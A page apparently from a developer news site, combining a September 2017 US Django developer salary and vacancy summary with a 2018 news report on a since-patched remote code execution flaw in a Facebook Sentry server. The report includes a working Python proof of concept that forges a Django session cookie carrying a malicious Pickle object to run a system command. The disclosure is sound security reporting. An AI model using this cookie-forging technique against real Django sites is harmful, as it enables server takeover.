Django developer salary September 2017

United States Django developers labor market analysis according to the results of September, 2017
06 September 2017   1128

We publish the analysis of the labour market of developers in the United States monthly. For Django developers there were 100 vacancies. The vacancy rates were distributed as follows. 

Salary Estimate Django September 2017Django developer salary estimate

Most of the developers are required in New York, NY; the least in Chicago, IL.

Number of vacancies in different cities Django September 2017 Number of Django developer vacancies in different cities

Among the companies that hire Django developers the leaders are: 

  • Smith & Keller
  • Jobspring Partners 
  • Elevano

Number of vacancies in different companies Django September 2017Number of Django developer vacancies in different companies 

According to the experience required, the vacancies are distributed as follows. 

Number of vacancies by experience level Django September 2017Django developer vacancies by the experience level

The average salary and salary according to the level of experience were distributed as follows.

Average salary Django September 2017Django developer average salary

The analysis was carried out by the Hype.codes portal method using the indeed.com data.

    Another Facebook Vulnerability to be Found

    Cybersecurity specialist from SCRT find a way to execute code on Facebook server remotely
    27 August 2018   864

    Daniel Le Gall from SCRT, reported about the vulnerability he found in one of the Facebook servers. The problem is in the Sentry web application for logs storage, written in Python using the Django framework. Facebook experts have already patched a security hole in the server.

    Daniel found the problem during the scanning of IP addresses of to the social network. On one of them Sentry service was located with host name sentryagreements.thefacebook.com. When reviewing the application, the specialist noticed a stack trace that appears for an unexpected reason, and problems with the user password reset function. According to him, the Django debugging mode was not disabled, so the trace opened the entire environment of the program:

    Facebook Vulnerability
    Facebook Vulnerability

    SCRT expert discovered among the keys of the environment SESSION_SERIALIZER, which was related to the method django.contrib.sessions.serializers.PickleSerializer. Daniel clarified that using a fake session containing arbitrary content of the binary Pickle protocol for serializing objects in Python, you can run any code in the system. To access the session, he needed a secret Django key, which appeared in the list of Sentry settings in plaintext called system.secret-key:

    Facebook Vulnerability
    Facebook Vulnerability

    The researcher wrote a proof-of-concept script that changed the existing contents of sentrysid cookies to an arbitrary object and made the page load for 30 seconds longer:

    #!/usr/bin/python
    import django.core.signing, django.contrib.sessions.serializers
    from django.http import HttpResponse
    import cPickle
    import os
    
    SECRET_KEY='[RETRIEVEDKEY]'
    #Initial cookie I had on sentry when trying to reset a password
    cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'
    newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
    class PickleRce(object):
        def __reduce__(self):
            return (os.system,("sleep 30",))
    newContent['testcookie'] = PickleRce()
    
    print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)

    He sent information about the vulnerability to Facebook team and received $ 5000 under the Bug Bounty program. The company specialists cleared the issue in 10 days after receiving the notification.